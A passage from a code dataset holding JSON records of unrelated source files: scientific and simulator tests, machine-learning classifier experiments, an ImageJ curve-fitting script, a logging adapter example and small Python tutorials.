-p').read()[:-1]\n lcd_line_1 = datetime.now().strftime('%b %d %H:%M:%S')\n lcd_line_2 = \"IP \" + get_ip()\n lcd_line_3 = uptime\n output = lcd_line_2 + '\\r\\n' + lcd_line_3\n\n lcd.home()\n lcd.write_string(output)\n sleep(10)\n","sub_path":"lcd_ip.py","file_name":"lcd_ip.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414571268","text":"from bordas import destacar_bordas\n\ndef testar_bordas():\n # crie um exemplo de imagem pequena para testar\n \n largura = 5\n altura = 3\n imagem = [\n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '1', '1']\n ]\n\n # cria a matriz de bordas que você espera para essa imagem\n bordas_esperadas = [ \n ['0', '0', '1', '1', '1'],\n ['0', '0', '1', '0', '1'],\n ['0', '0', '1', '1', '1'] \n ]\n\n # aqui chamamos a função sendo testada\n bordas_calculadas = destacar_bordas(largura, altura, imagem)\n\n # isso irá gerar um erro quando a função não estiver correta\n assert bordas_esperadas == bordas_calculadas\n\n # se o programa não falhou, então talvez sua função esteja correta\n\n\ntestar_bordas()\n","sub_path":"tarefa10/testar_bordas.py","file_name":"testar_bordas.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"423982437","text":"'''\r\n\r\nSimulator Test for affinity group antiHard policy.\r\n\r\n@author: Chao\r\n'''\r\n\r\nimport zstackwoodpecker.test_util as test_util\r\nimport zstackwoodpecker.test_lib as test_lib\r\nimport zstackwoodpecker.test_state as test_state\r\nimport zstackwoodpecker.operations.affinitygroup_operations as ag_ops\r\nimport zstackwoodpecker.operations.vm_operations as vm_ops\r\nimport zstackwoodpecker.operations.resource_operations as res_ops\r\nimport os\r\n\r\n\r\ntest_stub = test_lib.lib_get_test_stub()\r\ntest_obj_dict = test_state.TestStateDict()\r\ndef test():\r\n h1_name = os.environ.get(\"hostName\")\r\n cond = res_ops.gen_query_conditions('name', '=', h1_name)\r\n h1 = res_ops.query_resource(res_ops.HOST, cond)\r\n ag1 = ag_ops.create_affinity_group(name=\"ag1\", policy=\"antiHard\")\r\n vm1 = test_stub.create_ag_vm(affinitygroup_uuid=ag1.uuid, host_uuid=h1[0].uuid)\r\n test_obj_dict.add_vm(vm1)\r\n\r\n vm1.stop()\r\n \r\n hosts = vm_ops.get_vm_starting_candidate(vm1.get_vm().uuid, systemtag=[\"affinityGroupUuid::%s\" % ag1.uuid])\r\n assert len(hosts) == 3\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n ag_ops.delete_affinity_group(ag1.uuid)\r\n test_util.test_pass(\"Affinity Group antiHard policy pass\")\r\n \r\n\r\n#Will be called only if exception happens in test().\r\ndef error_cleanup():\r\n test_lib.lib_error_cleanup(test_obj_dict)\r\n","sub_path":"integrationtest/vm/simulator/affinitygroup/test_shared_antihard_policy12.py","file_name":"test_shared_antihard_policy12.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394815773","text":"# Copyright (c) 2017 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS 
OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics import (\n calculate_spike_pair_additive_stdp_weight)\nfrom spinnaker_testbase import BaseTestCase\nimport pyNN.spiNNaker as p\nimport numpy\n\n\ndef structural_with_stdp():\n p.setup(1.0)\n pre_spikes = numpy.array(range(0, 10, 2))\n pre_spikes_last_neuron = pre_spikes[pre_spikes > 0]\n A_plus = 0.01\n A_minus = 0.01\n tau_plus = 20.0\n tau_minus = 20.0\n w_min = 0.0\n w_max = 5.0\n w_init_1 = 5.0\n delay_1 = 2.0\n w_init_2 = 4.0\n delay_2 = 1.0\n stim = p.Population(1, p.SpikeSourceArray(pre_spikes), label=\"stim\")\n pop = p.Population(1, p.IF_curr_exp(), label=\"pop\")\n pop_2 = p.Population(1, p.IF_curr_exp(), label=\"pop_2\")\n pop_3 = p.Population(1, p.IF_curr_exp(), label=\"pop_3\")\n pop_4 = p.Population(1, p.IF_curr_exp(), label=\"pop_4\")\n pop.record(\"spikes\")\n pop_2.record(\"spikes\")\n proj = p.Projection(\n stim, pop, p.FromListConnector([]), p.StructuralMechanismSTDP(\n partner_selection=p.LastNeuronSelection(),\n formation=p.DistanceDependentFormation([1, 1], 1.0),\n elimination=p.RandomByWeightElimination(2.0, 0, 0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=w_init_1, initial_delay=delay_1,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_2 = p.Projection(\n stim, pop_2, p.FromListConnector([]), p.StructuralMechanismSTDP(\n partner_selection=p.RandomSelection(),\n formation=p.DistanceDependentFormation([1, 1], 1.0),\n elimination=p.RandomByWeightElimination(4.0, 0, 0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=w_init_2, initial_delay=delay_2,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_3 = p.Projection(\n stim, pop_3, p.FromListConnector([(0, 0)]),\n p.StructuralMechanismSTDP(\n partner_selection=p.LastNeuronSelection(),\n formation=p.DistanceDependentFormation([1, 1], 0.0),\n elimination=p.RandomByWeightElimination(4.0, 1.0, 1.0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=2.0, initial_delay=5.0,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n proj_4 = p.Projection(\n stim, pop_4, p.FromListConnector([(0, 0)]),\n p.StructuralMechanismSTDP(\n partner_selection=p.RandomSelection(),\n formation=p.DistanceDependentFormation([1, 1], 0.0),\n elimination=p.RandomByWeightElimination(4.0, 1.0, 1.0),\n timing_dependence=p.SpikePairRule(\n tau_plus, tau_minus, A_plus, A_minus),\n weight_dependence=p.AdditiveWeightDependence(w_min, w_max),\n f_rew=1000, initial_weight=4.0, initial_delay=3.0,\n s_max=1, seed=0, weight=0.0, delay=1.0))\n p.run(10)\n\n conns = list(proj.get([\"weight\", \"delay\"], \"list\"))\n conns_2 = list(proj_2.get([\"weight\", \"delay\"], \"list\"))\n conns_3 = list(proj_3.get([\"weight\", \"delay\"], \"list\"))\n conns_4 = list(proj_4.get([\"weight\", \"delay\"], \"list\"))\n\n spikes_1 = [s.magnitude\n for s in pop.get_data(\"spikes\").segments[0].spiketrains]\n spikes_2 = [s.magnitude\n for s in pop_2.get_data(\"spikes\").segments[0].spiketrains]\n\n p.end()\n\n print(conns)\n print(conns_2)\n print(conns_3)\n print(conns_4)\n\n w_final_1 = calculate_spike_pair_additive_stdp_weight(\n 
pre_spikes_last_neuron, spikes_1[0], w_init_1, delay_1,\n A_plus, A_minus, tau_plus, tau_minus)\n w_final_2 = calculate_spike_pair_additive_stdp_weight(\n pre_spikes, spikes_2[0], w_init_2, delay_2, A_plus, A_minus,\n tau_plus, tau_minus)\n print(w_final_1, spikes_1[0])\n print(w_final_2, spikes_2[0])\n\n assert len(conns) == 1\n assert conns[0][3] == delay_1\n assert (conns[0][2] >= w_final_1 - 0.01 and\n conns[0][2] <= w_final_1 + 0.01)\n assert len(conns_2) == 1\n assert conns_2[0][3] == delay_2\n assert (conns_2[0][2] >= w_final_2 - 0.01 and\n conns_2[0][2] <= w_final_2 + 0.01)\n assert len(conns_3) == 0\n assert len(conns_4) == 0\n\n\nclass TestStructuralWithSTDP(BaseTestCase):\n\n def test_structural_with_stdp(self):\n self.runsafe(structural_with_stdp)\n\n\nif __name__ == \"__main__\":\n structural_with_stdp()\n","sub_path":"spynnaker_integration_tests/test_struct_pl/test_structural_with_stdp.py","file_name":"test_structural_with_stdp.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"182188507","text":"import numpy as np\nimport sklearn\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.ensemble import BaggingClassifier, RandomForestClassifier\nimport matplotlib.pyplot as plt\nfrom classifier import *\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\nclass DecisionTree:\n def __init__(self, maxDepth=None):\n \"\"\"\n initializing decision tree and model to be trained.\n :param maxDepth: maximum depth of tree.\n \"\"\"\n self.model = None\n self.tree = DecisionTreeClassifier(max_depth=maxDepth)\n\n def fit(self, x: np.array, y: np.array):\n \"\"\"\n fit the model:\n :param x: dataset\n :param y: response vector\n :return: nothing, trains the self.model.\n \"\"\"\n self.model = self.tree.fit(x, y)\n\n def predict(self, x: np.array):\n \"\"\"\n gets test set and predicts the response vector.\n :param x: test set\n :return: predicted vector.\n \"\"\"\n return self.tree.predict(x)\n\n\ndef score(model, x: np.array, y: np.array):\n \"\"\"\n runs the model prediction on x and compares to the real y\n :param model: one of the models\n :param x: test set\n :param y: real y\n :return: dictionary contains num of samples, fp, tp, accuracy.\n \"\"\"\n y_predict = model.predict(x)\n error, true_pos, true_neg, false_pos, false_neg, n, p = 0, 0, 0, 0, 0, 0, 0\n tp = [0, 0, 0, 0, 0]\n fp = [[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]]\n for i in range(len(y)):\n if y_predict[i] != y[i]:\n error += 1\n 
fp[y[i]][y_predict[i]] += 1\n else:\n tp[y_predict[i]] += 1\n score_dict = {\"num_samples\": len(y), \"fp table\": fp, \"tp table\": tp,\n \"accuracy\": sum(tp) / len(y)}\n return score_dict\n\n\ndef runTTmodel(model, X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains a model on X_train, Y_train and runs on X_test, Y_test.\n :param model: one of our models.\n :param X_train: train set, numpy array.\n :param Y_train: train response vector, numpy array.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: the model's accuracy on the test set.\n \"\"\"\n model.fit(X_train, Y_train)\n score_dict = score(model, X_test, Y_test)\n print(\"false predictions: predicted column j while i is true label\")\n fp = score_dict[\"fp table\"]\n for i in range(len(fp)):\n print(fp[i])\n print(\"tp table\", score_dict[\"tp table\"])\n print(\"accuracy\", score_dict[\"accuracy\"])\n return score_dict[\"accuracy\"]\n\n\ndef runTrees(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by decision trees of increasing depth and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: nothing.\n \"\"\"\n print(\"Trees models\")\n for i in range(1, 5):\n dt = DecisionTree(i)\n print(\"Max depth:\", i)\n runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n\n\ndef runSVM(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by SVM and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: nothing.\n \"\"\"\n print(\"SVM models\")\n types = ['linear', 'poly']\n multi_ways = ['ovo', 'ovr']\n for i in range(1, 5):\n for tpe in types:\n for mul_func in multi_ways:\n dt = SVC(i, kernel=tpe, decision_function_shape=mul_func)\n print(\"C:\", i, \"svm type:\", tpe, \"multi:\", mul_func)\n runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n\n\ndef runKnn(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by K-nearest-neighbors and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: nothing.\n \"\"\"\n print(\"KNN models\")\n for i in (list(range(4, 50, 5)) + [2, 3]):\n print(\"number of neighbors:\", i)\n kn = KNeighborsClassifier(n_neighbors=i)\n runTTmodel(kn, X_train, Y_train, X_test, Y_test)\n\n\ndef runLDA(X_train, Y_train, X_test, Y_test):\n \"\"\"\n trains the train set by LDA and checks it by the test set.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test: test response vector.\n :return: nothing.\n \"\"\"\n print(\"LDA model\")\n set_lda = ['svd', 'lsqr']\n for ld in set_lda:\n print(\"LDA Model:\", ld)\n lda = LinearDiscriminantAnalysis(solver=ld)\n runTTmodel(lda, X_train, Y_train, X_test, Y_test)\n\n\ndef runBag(X_train, Y_train, X_test, Y_test):\n # dt = DecisionTreeClassifier(max_depth=5)\n # runTTmodel(dt, X_train, Y_train, X_test, Y_test)\n print(\"Bag model\")\n bm = BaggingClassifier(base_estimator=DecisionTreeClassifier(max_depth=5),\n n_estimators=30)\n runTTmodel(bm, X_train, Y_train, X_test, Y_test)\n\n\ndef runTrainTest(X, Y, newX, newY):\n runTrees(X, Y, newX, newY)\n runKnn(X, Y, newX, newY)\n # runSVM(X, Y, newX, newY)\n runLDA(X, Y, newX, newY)\n\n\ndef baggingModels(models, X_train, Y_train, X_test, Y_test):\n accuracy_arr = np.zeros(len(models))\n print(\"Bagging\")\n for i, model in enumerate(models):\n 
print(\"Bagging model:\", model)\n bm = BaggingClassifier(base_estimator=model)\n accuracy_arr[i] = runTTmodel(bm, X_train, Y_train, X_test, Y_test)\n print(accuracy_arr)\n\n\ndef run_adaboost(X_train, Y_train, X_test, Y_test):\n \"\"\"\n runs adaboost on the data.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n model = AdaBoostClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=2),\n n_estimators=50) # 0.477\n # model = AdaBoostClassifier(base_estimator=SVM(30))\n runTTmodel(model, X_train, Y_train, X_test, Y_test)\n\n\ndef learner_by_loc(X_train, Y_train, X_test, Y_test):\n \"\"\"\n learning algorithm just by location.\n :param X_train: train set.\n :param Y_train: train response vector.\n :param X_test: test set.\n :param Y_test:test response vector.\n :return: nothing.\n \"\"\"\n feats = ['Latitude', 'Longitude']\n for name in list(X_train.columns):\n if \"half\" in name:\n feats.append(name)\n X_train = X_train[feats]\n X_test = X_test[feats]\n X_train, Y_train = X_train.to_numpy(), Y_train.to_numpy()\n X_test, Y_test = X_test.to_numpy(), Y_test.to_numpy()\n model = BaggingClassifier(\n base_estimator=DecisionTreeClassifier(max_depth=400), n_estimators=100)\n runTTmodel(model, X_train, Y_train, X_test, Y_test)\n\n\ndef plot_points_q_99(x_p, x_n, x_p1, x_n1, x5, ax, num_of_samples):\n ax.scatter(x_p.T[0], x_p.T[1], s=1, marker='.', c='blue')\n ax.scatter(x_n.T[0], x_n.T[1], s=1, marker='.', c='orange')\n ax.scatter(x_p1.T[0], x_p1.T[1], s=1, marker='.', c='red')\n ax.scatter(x_n1.T[0], x_n1.T[1], s=1, marker='.', c='green')\n ax.scatter(x5.T[0], x5.T[1], s=1, marker='.', c='pink')\n ax.set_title(f'Number of samples: {num_of_samples[0]}', size=15)\n ax.set_xlabel('Longitude', size=10)\n ax.set_ylabel('Latitude', size=10)\n\n\ndef showfigs(x, y, predicted_y):\n xlong = x['Longitude'].to_numpy()\n xlong = np.reshape(xlong, (-1, 1))\n xlat = x['Latitude'].to_numpy()\n xlat = np.reshape(xlat, (-1, 1))\n x_location = np.hstack((xlong, xlat))\n x_1 = x_location[y == 0]\n x_2 = x_location[y == 1]\n x_3 = x_location[y == 2]\n x_4 = x_location[y == 3]\n x_5 = x_location[y == 4]\n print(\"size of \", crimes_dict[0], \"is: \", x_1.shape)\n print(\"size of \", crimes_dict[1], \"is: \", x_2.shape)\n print(\"size of \", crimes_dict[2], \"is: \", x_3.shape)\n print(\"size of \", crimes_dict[3], \"is: \", x_4.shape)\n print(\"size of \", crimes_dict[4], \"is: \", x_5.shape)\n print(x_location)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plot_points_q_99(x_1, x_2, x_3, x_4, x_5, ax, x_location.shape)\n ax.legend()\n fig.show()\n\n\ndef checkPicsLda(X, Y, X_test, Y_test):\n \"\"\"\n show diffrences between the figures of the real ones\n and the predicted ones.\n \"\"\"\n x = X\n X, Y = X.to_numpy(), Y.to_numpy()\n X_test, Y_test = X_test.to_numpy(), Y_test.to_numpy()\n ld = LinearDiscriminantAnalysis()\n ld.fit(X, Y)\n predY = ld.predict(X_test)\n showfigs(x, Y_test, predY)\n\n\ndef k_folds(k, X, y, models):\n \"\"\"\n splits to k folds an the returns the best model and its average.\n :param k: number of folds.\n :param X: data set, numpy array.\n :param y: vector response, numpy array.\n :param models: differnt models for prdiction\n :return:\n \"\"\"\n means = []\n for model in models:\n cross = cross_val_score(model, X, y, cv=k)\n print(cross)\n means.append(np.mean(cross))\n return np.argmax(np.array(means)), np.max(np.array(means))\n\n\ndef create_models():\n 
\"\"\"\n    creates different types of models to be tested in k-folds.\n    :return: the models, array.\n    \"\"\"\n    models_chunks = []\n\n    # trees\n    temp = []\n    for i in (list(range(2, 21, 7)) + [3, 4]):\n        temp.append(BaggingClassifier(base_estimator=DecisionTreeClassifier(\n            max_depth=i), n_estimators=6))\n    models_chunks.append(temp)\n\n    # k-nn\n    temp = []\n    for i in (list(range(4, 50, 22)) + [2, 5]):\n        temp.append(BaggingClassifier(KNeighborsClassifier(n_neighbors=i),\n                                      n_estimators=2))\n    models_chunks.append(temp)\n\n    # lda\n    temp = []\n    set_lda = ['svd', 'lsqr']\n    for ld in set_lda:\n        temp.append(BaggingClassifier(LinearDiscriminantAnalysis(solver=ld),\n                                      n_estimators=10))\n    models_chunks.append(temp)\n\n    return models_chunks\n\n\ndef find_best(X, y):\n    \"\"\"\n    runs the k-folds on different models.\n    :param X: dataset\n    :param y: response vector\n    :return: nothing\n    \"\"\"\n    models_chunks = create_models()\n    for chunk in models_chunks:\n        print(k_folds(5, X, y, chunk))\n\n","sub_path":"task2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"429322815","text":"\"\"\" List Comprehension\n\nIn Python 3, map, filter and reduce will lose importance;\nthey are discouraged in favor of list comprehensions.\n\nThis feature is a construct that allows building lists\nfrom other lists.\n\"\"\"\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# replace map\nl2 = [n ** 2 for n in l]\n\nprint(l2)\n\n# replace filter\nl3 = [n for n in l if n % 2 == 0]\nprint(l3)\n\nm = [0, 1, 2, 3]\nn = ['a', 'b']\n# o = [ s * v for s in n\n#     for v in m\n#     if v > 0]\n\no = []\n\nfor s in n:\n    for v in m:\n        if v > 0:\n            o.append(s * v)\n\nprint(o)\n\n","sub_path":"python_para_todos_p2/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"239607330","text":"from __future__ import division\n\nimport math\nimport re\nimport time\n\nfrom java.lang import Runnable\nfrom java.lang import Runtime\nfrom java.lang import RuntimeException\nfrom java.lang import Thread\nfrom java.lang.reflect import Array\nfrom java.util.concurrent.atomic import AtomicInteger\n\nfrom ij import IJ\nfrom ij import ImagePlus\nfrom ij.plugin import Duplicator\nfrom ij.process import FloatProcessor\n\nfrom org.apache.commons.math3.fitting import SimpleCurveFitter\nfrom org.apache.commons.math3.fitting import WeightedObservedPoints\nfrom org.apache.commons.math3.analysis import ParametricUnivariateFunction\n\npattern_eloss = re.compile('(\\d+(?:\\.\\d+)?)eV')\n\nclass ZProfiles:\n\n    def __init__(self, imp, offset):\n        self.imp = imp\n        self.loss_offset = offset\n        self.w = imp.getWidth()\n        self.h = imp.getHeight()\n        self.index = self.w * self.h\n        self.offset = [0] * (self.w * self.h)\n        self.width = [0] * (self.w * self.h)\n        self.amplitude = [0] * (self.w * self.h)\n        self.elosses = []\n        self.pixels = []\n        for z in range(self.imp.getStackSize()):\n            label = self.imp.getStack().getShortSliceLabel(z+1)\n            match = pattern_eloss.search(label)\n            loss = float(match.group(1)) - self.loss_offset\n            self.elosses.append(loss)\n            self.pixels.append(self.imp.getStack().getPixels(z + 1))\n            IJ.showProgress(z + 1, self.imp.getStackSize())\n\n\ndef create_nic(data):\n    fp = FloatProcessor(data.w, data.h)\n    for y in range(data.h):\n        for x in range(data.w):\n            index = x + y * data.w\n            
fp.setf(index, data.offset[index])\n imp = ImagePlus(\"NIC\", fp)\n return imp\n\ndef create_width(data):\n fp = FloatProcessor(data.w, data.h)\n for y in range(data.h):\n for x in range(data.w):\n index = x + y * data.w\n fp.setf(index, data.width[index])\n imp = ImagePlus(\"width\", fp)\n return imp\n\ndef create_amplitude(data):\n fp = FloatProcessor(data.w, data.h)\n for y in range(data.h):\n for x in range(data.w):\n index = x + y * data.w\n fp.setf(index, data.amplitude[index])\n imp = ImagePlus(\"amplitude\", fp)\n return imp\n\nclass Zlp(ParametricUnivariateFunction):\n\n def value(self, x, parameters):\n a, m, s = parameters\n return a * math.exp(-(x - m)**4/(4 * (1.1 * s)**4))\n\n def gradient(self, x, parameters):\n a, m, s = parameters\n da = math.exp(-(m - x)**4 / (4 * (1.1 * s)**4))\n dm = -(m - x)**3 * self.value(x, parameters) / (1.1 * s)**4\n ds = (m - x)**4 * self.value(x, parameters) / (1.1 * s)**5\n return [da, dm, ds]\n\ndef create_fitter():\n func = Zlp()\n params_start = [1e4, 0, 1.4]\n fitter = SimpleCurveFitter.create(func, params_start)\n return fitter\n\ndef fit_gauss(fitter, data, index):\n points = WeightedObservedPoints()\n for i, z in enumerate(data.elosses):\n points.add(1, z, data.pixels[i][index])\n amplitude, offset, width = fitter.fit(points.toList())\n data.offset[index] = offset\n data.width[index] = width\n data.amplitude[index] = amplitude\n\ndef multithread_func(func, data):\n threads = Array.newInstance(Thread, Runtime.getRuntime().availableProcessors())\n print('Processing %d profiles with %d threads.' % (data.index, len(threads)))\n ai = AtomicInteger(0)\n progress = AtomicInteger(1)\n class Body(Runnable):\n\n def __init__(self):\n self.fitter = create_fitter()\n\n def run(self):\n for i in (ai.getAndIncrement() for _ in range(data.index)):\n if i < data.index:\n func(self.fitter, data, i)\n IJ.showProgress(progress.getAndIncrement(), data.index)\n for i in range(len(threads)):\n threads[i] = Thread(Body())\n threads[i].start()\n for thread in threads:\n thread.join()\n\ndef main():\n try:\n inputImp = IJ.getImage()\n if inputImp.getStackSize() <= 1:\n IJ.showMessage(\"Error\", \"There must be at least a stack open.\")\n return\n except RuntimeException:\n # Exit if IJ.getImage() was not able to return an image.\n return\n\n # We guess that the stack is sorted by energy loss and that the ZLP is at the centre of the stack.\n offset_match = pattern_eloss.search(\n inputImp.getStack().getShortSliceLabel(\n int(math.floor(inputImp.getStackSize() / 2)) + 1\n )\n )\n offset = float(offset_match.group(1))\n offset = IJ.getNumber(\"Enter energy loss offset: \", offset)\n if (offset == IJ.CANCELED) :\n return\n\n IJ.showStatus(\"Preparing the data...\")\n IJ.showProgress(0)\n zProfiles = ZProfiles(inputImp, offset)\n if zProfiles == IJ.CANCELED:\n return\n IJ.showStatus(\"Calculating the NIC...\")\n IJ.showProgress(0)\n start_time = time.time()\n '''\n for profile in zProfiles:\n fit_gauss(zProfiles.fitter, profile)\n '''\n multithread_func(fit_gauss, zProfiles)\n print('Fitting took %.3fs to finish.' % (time.time() - start_time,))\n create_nic(zProfiles).show()\n create_width(zProfiles).show()\n create_amplitude(zProfiles).show()\n\nif __name__ == '__main__':\n main()","sub_path":"Jython/measureNIC.py","file_name":"measureNIC.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281022138","text":"#! 
/usr/bin/env python3\n# coding: utf-8\n#\n# author: kaku\n# date: 18/07/29\n#\n# GitHub:\n#\n# https://github.com/kakuchange\n#\n# Description:\n#\n# Customize your logger (adaptor).\nimport logging\n\n\nclass CustomAdapter(logging.LoggerAdapter):\n    \"\"\"\n    This example adapter expects the passed in dict-like object to have a\n    'connid' key, whose value in brackets is prepended to the log message.\n    \"\"\"\n    def process(self, msg, kwargs):\n        return 'I\\'m dynamic info => [%s] || old info => %s' % (self.extra['connid'], msg), kwargs\n\n\ndef actual_use():\n    # root logger\n    logger = logging.getLogger()\n    # set level\n    logger.setLevel(logging.DEBUG)\n    # set formatter\n    formatter = logging.Formatter('[%(levelname).1s] %(asctime)s %(name)s: %(message)s')\n    # file & console stream handler\n    sh = logging.StreamHandler()\n    fh = logging.FileHandler(filename='dynamic.log')\n    # set handler's level format\n    sh.setLevel(logging.DEBUG)\n    fh.setLevel(logging.DEBUG)\n\n    sh.setFormatter(formatter)\n    fh.setFormatter(formatter)\n    # add handler to logger\n    logger.addHandler(sh)\n    logger.addHandler(fh)\n    # get context info logger (adaptor)\n    adaptor = CustomAdapter(logger, {'connid': 'I am kaku'})\n\n    # finally, compare the context-enriched log with the raw logger :)\n    logger.debug('hi i am raw looooooger!')\n    adaptor.debug('hi i am context adaptoooooor!')\n\n\nif __name__ == \"__main__\":\n    actual_use()\n","sub_path":"python_example/log_tool/mycontext_info_adaptor.py","file_name":"mycontext_info_adaptor.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"194544920","text":"\"\"\"\ngets rid of any line in the orbit file that does not have 6 entries\n\nhttp://stackoverflow.com/questions/4710067/deleting-a-specific-line-in-a-file-python\n\"\"\"\n\nfn = \"orbit0.dat\"\n\nf = open(fn, \"r+\")\nlines = f.readlines()\nf.seek(0)\nfor line in lines:\n    line_sp = line.split()\n    if len(line_sp) == 6:\n        # There should be six entries in each line (http://fargo.in2p3.fr/Output)\n        f.write(line)\nf.truncate()\nf.close()","sub_path":"code_fargo/cleanseOrbitFile.py","file_name":"cleanseOrbitFile.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"292822748","text":"from thirtycli.actions.common import Action\nfrom thirtycli import utils\n\n\nclass PublishAction(Action):\n    \"\"\"Publish an app.\"\"\"\n\n    ##\n    # Publish an application\n    ##\n    @utils.arg('app',\n               metavar=\"\",\n               help=\"The app to publish.\")\n    def do_publish(self, args, global_args):\n        \"\"\"Publish an app (upgrade to paid).\"\"\"\n        cmd = {\n            'action': 'publish',\n        }\n        args.appname = args.app\n        args.service = None\n\n        self._run_command(args, global_args, cmd)\n","sub_path":"thirtycli/actions/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"542303382","text":"\n\n#class header\nclass _WAX():\n\tdef __init__(self,): \n\t\tself.name = \"WAX\"\n\t\tself.definitions = [u'to put a thin layer of wax on the surface of something, either to make it waterproof or to improve its appearance: ', u\"to remove hair from someone's body by covering it in a thin layer of warm wax that is then pulled off: \", u'When the moon waxes, it gradually appears larger and rounder each day.', u'to speak or write in the stated way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = 
[]\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_wax.py","file_name":"_wax.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"106925802","text":"# law of large numbers\n\nimport random\nfrom matplotlib import pyplot as plt\n\nprobability_tails = 0.5\nn = 500\n\ncount = []\ntails = 0\n\nfor i in range(1, n):\n    ran = random.random()\n    if ran > probability_tails:\n        tails += 1\n    else:\n        tails -= 1\n    expected_tails = tails / i\n    count.append(expected_tails)\n\nx_range = list(range(len(count)))\n\nfig = plt.figure()\nax1 = fig.add_subplot(2, 1, 1)\nax2 = fig.add_subplot(2, 1, 2)\n\nax1.plot(x_range, count, color=\"b\", label=\"expected tails\")\nax1.set_xlabel(\"n\")\nax1.set_ylabel(\"expected tails\")\nax1.set_xlim(5, n)\nax1.set_ylim(-1, 1)\nax1.axhline(0, color='black', ls='--')\n\nax2.hist(count, bins=30)\n\nplt.show()\n","sub_path":"practise matplotlib/heads_tails_distribution.py","file_name":"heads_tails_distribution.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
